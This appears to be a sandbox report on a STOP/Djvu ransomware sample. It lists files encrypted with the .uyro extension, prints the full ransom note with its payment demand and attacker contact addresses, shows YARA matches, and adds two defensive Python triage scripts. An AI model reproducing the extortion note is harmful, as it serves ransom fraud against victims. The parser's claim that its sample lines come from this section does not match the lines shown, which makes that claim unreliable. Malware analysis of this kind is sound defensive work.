Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91ed1363-4d6b-46a6-b5af-d1ee0e00268b}\Apps.ft entropy: 7.99262014283
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91ed1363-4d6b-46a6-b5af-d1ee0e00268b}\Apps.index entropy: 7.99878279768
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pa-Arab-PK\FileSync.LocalizedResources.dll.mui entropy: 7.99637167206
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ac30bccc-f672-44da-81fe-b3f316bbd507}\0.0.filtertrie.intermediate.txt entropy: 7.99026027718
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ac30bccc-f672-44da-81fe-b3f316bbd507}\Apps.ft entropy: 7.99442743123
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ac30bccc-f672-44da-81fe-b3f316bbd507}\Apps.index entropy: 7.9987430163
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\appsconversions.txt entropy: 7.99403941778
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\appssynonyms.txt entropy: 7.99767606024
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\rw\FileSync.LocalizedResources.dll.mui entropy: 7.99716449323
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\settingsconversions.txt entropy: 7.99503561135
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\settingsglobals.txt entropy: 7.9950159432
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\settingssynonyms.txt entropy: 7.9976174437
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{13d888a1-0da9-488d-b29e-c632055a5b8d}\0.0.filtertrie.intermediate.txt entropy: 7.99843394049
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{13d888a1-0da9-488d-b29e-c632055a5b8d}\Settings.ft entropy: 7.99874765159
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7b0be05b-dd29-4634-bd2c-c09b9631250d}\0.0.filtertrie.intermediate.txt entropy: 7.998237632
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7b0be05b-dd29-4634-bd2c-c09b9631250d}\Settings.ft entropy: 7.99856325981
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\MessagingBackgroundTaskLog.etl entropy: 7.99297738514
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ti\FileSync.LocalizedResources.dll.mui entropy: 7.99838926231
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\wo\FileSync.LocalizedResources.dll.mui entropy: 7.99869275521
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\xh-ZA\FileSync.LocalizedResources.dll.mui entropy: 7.9956248886
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\yo-NG\FileSync.LocalizedResources.dll.mui entropy: 7.9982607823
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-CN\FileSync.LocalizedResources.dll.mui entropy: 7.99796320318
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-TW\FileSync.LocalizedResources.dll.mui entropy: 7.99830075129
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat entropy: 7.99725586109
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2019-06-27_113458_1850-1854.log entropy: 7.9978716096
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1 entropy: 7.99745726518
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat entropy: 7.99779745496
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm entropy: 7.9933042204
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl entropy: 7.99695428486
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat entropy: 7.99644028819
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl entropy: 7.99738642168
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl entropy: 7.99703999482
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG1 entropy: 7.99501738601
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui entropy: 7.99013403458
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui entropy: 7.99588139821
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\chrome_installer.log entropy: 7.99237075024
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui entropy: 7.99015668004
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Office\MSO1033.acl entropy: 7.99566565374
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT entropy: 7.99615692743
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe entropy: 7.99873980315
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\MSIMGSIZ.DAT entropy: 7.9960114755
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\SmartScreenCache.dat entropy: 7.99833031083
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst entropy: 7.99807962222
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin entropy: 7.9951655608
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\chrome_installer.log.uyro (copy) entropy: 7.99237075024
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Application Data\Microsoft\Office\MSO1033.acl.uyro (copy) entropy: 7.99566565374
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\Internet Explorer\MSIMGSIZ.DAT.uyro (copy) entropy: 7.99615692743
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe.uyro (copy) entropy: 7.99873980315
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temporary Internet Files\Low\MSIMGSIZ.DAT.uyro (copy) entropy: 7.9960114755
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temporary Internet Files\Low\SmartScreenCache.dat.uyro (copy) entropy: 7.99833031083
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt19.lst.uyro (copy) entropy: 7.99807962222
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache.bin.uyro (copy) entropy: 7.9951655608
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\Internet Explorer\UrlBlock\urlblock_637194112741176080.bin.uyro (copy) entropy: 7.99442966622
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\ThirdPartyNotices.txt.uyro (copy) entropy: 7.99590032893
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db.uyro (copy) entropy: 7.99840183987
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000016.db.uyro (copy) entropy: 7.99843170661
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db.uyro (copy) entropy: 7.99821329563
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000b.db.uyro (copy) entropy: 7.99831618931
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.uyro (copy) entropy: 7.99833774153
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\MessagingBackgroundTaskLog.etl.uyro (copy) entropy: 7.99297738514
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.uyro (copy) entropy: 7.99725586109
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1.uyro (copy) entropy: 7.99745726518
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat.uyro (copy) entropy: 7.99779745496
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.uyro (copy) entropy: 7.9933042204
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl.uyro (copy) entropy: 7.99695428486 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat.uyro (copy) entropy: 7.99644028819 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl.uyro (copy) entropy: 7.99738642168 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl.uyro (copy) entropy: 7.99703999482 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG1.uyro (copy) entropy: 7.99501738601 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui.uyro (copy) entropy: 7.99013403458 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui.uyro (copy) entropy: 7.99588139821 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui.uyro (copy) entropy: 7.99015668004 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui.uyro (copy) entropy: 7.99409784357 Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File dropped: C:\_readme.txt ->
    decrypt tool and unique key for you.
    this software will decrypt all your encrypted files.
    what guarantees you have?
    you can send one of your encrypted file from your pc and we decrypt it for free.
    but we can decrypt only 1 file for free. file must not contain valuable information.
    you can get and look video overview decrypt tool:
    https://we.tl/t-5ucwrds3ed
    price of private key and decrypt software is $980.
    discount 50% available if you contact us first 72 hours, that's price for you is $490.
    please note that you'll never restore your data without payment.
    check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.
    to get this software you need write on our e-mail:
    support@fishmail.top
    reserve e-mail address to contact us:
    datarestorehelp@airmail.cc
    your personal id:
    0609djfsieek6te1ygpnibo4gcgoep3ihx1cffhbueguxrgm3xs
    Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File dropped: C:\Users\user\_readme.txt ->
    decrypt tool and unique key for you.
    this software will decrypt all your encrypted files.
    what guarantees you have?
    you can send one of your encrypted file from your pc and we decrypt it for free.
    but we can decrypt only 1 file for free. file must not contain valuable information.
    you can get and look video overview decrypt tool:
    https://we.tl/t-5ucwrds3ed
    price of private key and decrypt software is $980.
    discount 50% available if you contact us first 72 hours, that's price for you is $490.
    please note that you'll never restore your data without payment.
    check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.
    to get this software you need write on our e-mail:
    support@fishmail.top
    reserve e-mail address to contact us:
    datarestorehelp@airmail.cc
    your personal id:
    0609djfsieek6te1ygpnibo4gcgoep3ihx1cffhbueguxrgm3xs
    Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption;device devices;encode encodes;encryption encryptions;locker;protection;secure;tpm"}},{"system.parsingname":{"type":12,"value":"aaa_settingsgrouppcsystemsupportinfo.settingcontent-ms"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagepcsysteminfo"},"system.setting.groupid":{"type":12,"value":"settingsgrouppcsystemsupportinfo"},"system.comment":{"type":12,"value":"get pc support info"},"system.highkeywords":{"type":12,"value":"help;support"}},{"system.parsingname":{"type":12,"value":"aaa_settingsgrouppcsystemtouchkeyboard.settingcontent-ms"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagetimeregionspelling"},"system.setting.groupid":{"type":12,"value":"settingsgrouppcsystemtouchkeyboard"},"system.comment":{"type":12,"value":"touch keyboard settings"},"system.highkeywords":{"type":12,"value":""}},{"system.parsingname":{"type":12,"value":"aaa_settingsgrouppcsystemwindowsinfo.settingcontent- Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4b01d48e-72ca-4621-8570-a88f4a6b1ec4}\appsglobals.txt -> encryptiondesktop.desktop11814{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\elcomsoft password recovery\advanced archive password recovery\archpr.exe11815steam://rungameid/37200011815e1354d8c.581001032d2e9_97d7ef5pp7jwp!app11815xiaomi.miui.miphonemanager11816c:\gog games\the witcher 3 wild hunt\bin\x64\witcher3.exe11816sony.vaio.vaiomoviecreator11817prosiebensat.1digitalgmbh.7tv_fzbtnr0mjybby!app11818{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\adobe\adobe digital editions 3.0\digitaleditions.exe11818{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\intel\intel(r) ssd toolbox\intel ssd toolbox.exe11818{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\nuance\naturallyspeaking14\program\natspeak.exe1181946436stefanpodskubka.remoteterminal_gtq1wtggx9tf0!app11819{6d809377-6af0-444b-8957-a3773f02200e}\tigervnc\vncviewer.exe11820{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\mimo\mimo.exe11820desi..tion_edb36ae7cf19da31_e81d836730e1eada11821{7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e}\prtg network monitor\enterprise co Jump to dropped file
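The dropped-file entries above share two indicators a responder can sweep a host for: every encrypted file carries the appended .uyro extension and scores 7.99+ bits/byte, and the sandbox recorded a _readme.txt note at the drive root and in the user profile. The script below is an added example, not part of the sandbox report or of any sandbox tooling. It computes Shannon entropy over each candidate file and over its leading window separately, because some ransomware families encrypt only a prefix of large files and whole-file entropy then stays low; the 7.9 cut-off, the 16 KiB head window and the sample files it builds in a temporary directory are assumptions for the demonstration.

```python
import math
import random
import tempfile
from collections import Counter
from pathlib import Path

# Indicators taken from the report: the extension appended to every encrypted
# file and the name of the dropped ransom note.
ENCRYPTED_EXT = ".uyro"
RANSOM_NOTE = "_readme.txt"
# Every renamed file in the report sits at 7.99+ bits/byte; 7.9 is the cut-off
# used here (assumption).
ENTROPY_THRESHOLD = 7.9
# Leading window scored on its own (assumption: 16 KiB).
HEAD_BYTES = 16 * 1024


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty or constant input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def score_file(path: Path) -> dict:
    """Entropy of the whole file and of its leading HEAD_BYTES window."""
    data = path.read_bytes()
    return {
        "path": str(path),
        "full": round(shannon_entropy(data), 4),
        "head": round(shannon_entropy(data[:HEAD_BYTES]), 4),
    }


def triage_tree(root: Path) -> dict:
    """Walk root and bucket the indicators:
    encrypted   - has the extension and the whole file is high-entropy
    prefix_only - has the extension, only the leading window is high-entropy
                  (what a prefix-encrypting family leaves behind on large files)
    low_entropy - has the extension but neither window is high-entropy
                  (interrupted or stub write; inspect by hand)
    notes       - ransom note files
    """
    buckets = {"encrypted": [], "prefix_only": [], "low_entropy": [], "notes": []}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        if path.name == RANSOM_NOTE:
            buckets["notes"].append(str(path))
            continue
        if path.suffix.lower() != ENCRYPTED_EXT:
            continue
        info = score_file(path)
        if info["full"] >= ENTROPY_THRESHOLD:
            buckets["encrypted"].append(info)
        elif info["head"] >= ENTROPY_THRESHOLD:
            buckets["prefix_only"].append(info)
        else:
            buckets["low_entropy"].append(info)
    return buckets


def build_demo_tree(root: Path) -> None:
    """Constructed test data (not files from the report): one fully random file, one
    with only a 16 KiB random prefix, one all-zero stub, a note and an untouched text file."""
    rng = random.Random(1)

    def rnd(n: int) -> bytes:
        return bytes(rng.getrandbits(8) for _ in range(n))

    docs = root / "Documents"
    docs.mkdir(parents=True, exist_ok=True)
    (docs / "report.docx.uyro").write_bytes(rnd(64 * 1024))
    (docs / "archive.vhd.uyro").write_bytes(rnd(HEAD_BYTES) + b"\x00" * (48 * 1024))
    (docs / "stub.uyro").write_bytes(b"\x00" * 512)
    (docs / "notes.txt").write_text("plain text that was never touched\n" * 20)
    (root / RANSOM_NOTE).write_text("constructed placeholder for a ransom note\n")


def run_demo() -> dict:
    """Build the constructed tree in a temporary directory and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_demo_tree(root)
        return triage_tree(root)


if __name__ == "__main__":
    for name, items in run_demo().items():
        print(f"{name}: {len(items)}")
        for item in items:
            print("   ", item)
```

Point `triage_tree` at a mounted image or a live profile instead of the constructed tree to get the same four buckets; the prefix_only bucket is the one that whole-file entropy alone would have missed.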

System Summary

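The match list in this section uses two naming schemes for the same processes: unpacked-PE sources are written as decimal pid, dump index, image name, base address and slot (9.0.U59WtZz2Sg.exe.400000.2.unpack), while memory-dump sources are written with the pid and dump index as 8-digit hex fields (00000011.00000000...sdmp pairs with the 17.0.U59WtZz2Sg.exe entries, 00000009 with 9.x). Joining the two matters for triage: in this section the only RedLineStealer rule hit is in a memory dump of process 7, not in any unpacked PE, so it is only attributable to U59WtZz2Sg.exe once the hex pid is resolved. The parser below is an added example, not part of the sandbox report; it reads lines in the format shown here, resolves both source forms to a pid, and summarises rule families per process. The sample lines are copied from this section, and the rule-name-to-family table is a convenience assumption.

```python
import re
from collections import defaultdict

# Constructed input: a subset of the match lines from this section, verbatim.
SAMPLE_LINES = """\
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 11.2.build3.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000007.00000002.350733876.0000000002105000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
"""

LINE_RE = re.compile(
    r"^Source: (?P<source>.+?), type: (?P<type>\S+) Matched rule: (?P<rule>.+?) Author: (?P<author>.+)$"
)
# <pid>.<dump>.<image>.<base>.<slot>[.raw].unpack  -- pid and dump index in decimal
UNPACK_RE = re.compile(
    r"^(?P<pid>\d+)\.(?P<dump>\d+)\.(?P<image>.+)\.(?P<base>[0-9a-f]+)\.(?P<slot>\d+)\.(?:raw\.)?unpack$"
)
# <pid>.<dump>.<id>.<base>.<8-hex fields>.sdmp  -- pid and dump index as 8-digit hex
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9a-f]{8})\.(?P<dump>[0-9a-f]{8})\.(?P<id>\d+)\.(?P<base>[0-9a-f]{16})(?:\.[0-9a-f]{8})+\.sdmp$"
)

# Assumption: keyword table mapping rule names to a family label for the summary.
FAMILY_KEYWORDS = {"stop": "STOP/Djvu", "clipbanker": "Clipbanker", "redline": "RedLine"}


def family_of(rule: str) -> str:
    """Map a rule name to a family label; unknown rules keep their own name."""
    low = rule.lower()
    for key, label in FAMILY_KEYWORDS.items():
        if key in low:
            return label
    return rule


def parse_source(source: str) -> dict:
    """Resolve a source string to a scope (pid, 'pcap' or the raw string), image and base."""
    if source.endswith(".pcap"):
        return {"scope": "pcap", "image": None, "kind": "pcap", "base": None}
    m = UNPACK_RE.match(source)
    if m:
        return {"scope": int(m["pid"]), "image": m["image"], "kind": "unpackedpe",
                "base": int(m["base"], 16)}
    m = SDMP_RE.match(source)
    if m:
        # hex pid: 00000011 -> 17, 00000009 -> 9
        return {"scope": int(m["pid"], 16), "image": None, "kind": "memory",
                "base": int(m["base"], 16)}
    return {"scope": source, "image": None, "kind": "other", "base": None}


def summarize(report_text: str) -> dict:
    """Per scope: image name (when an unpacked-PE line names it), families, rules, match count."""
    summary = defaultdict(lambda: {"image": None, "families": set(), "rules": set(), "matches": 0})
    for line in report_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        src = parse_source(m["source"])
        entry = summary[src["scope"]]
        if src["image"] and entry["image"] is None:
            entry["image"] = src["image"]
        entry["families"].add(family_of(m["rule"]))
        entry["rules"].add(m["rule"])
        entry["matches"] += 1
    return dict(summary)


if __name__ == "__main__":
    for scope, e in sorted(summarize(SAMPLE_LINES).items(), key=lambda kv: str(kv[0])):
        print(scope, e["image"], sorted(e["families"]), e["matches"])
```

Feed the whole match list to `summarize` and any family that appears only under a memory-dump source (here RedLine on process 7) stands out as a hit the unpacked-PE view alone does not show.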
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 5.3.U59WtZz2Sg.exe.3060000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 5.3.U59WtZz2Sg.exe.3060000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
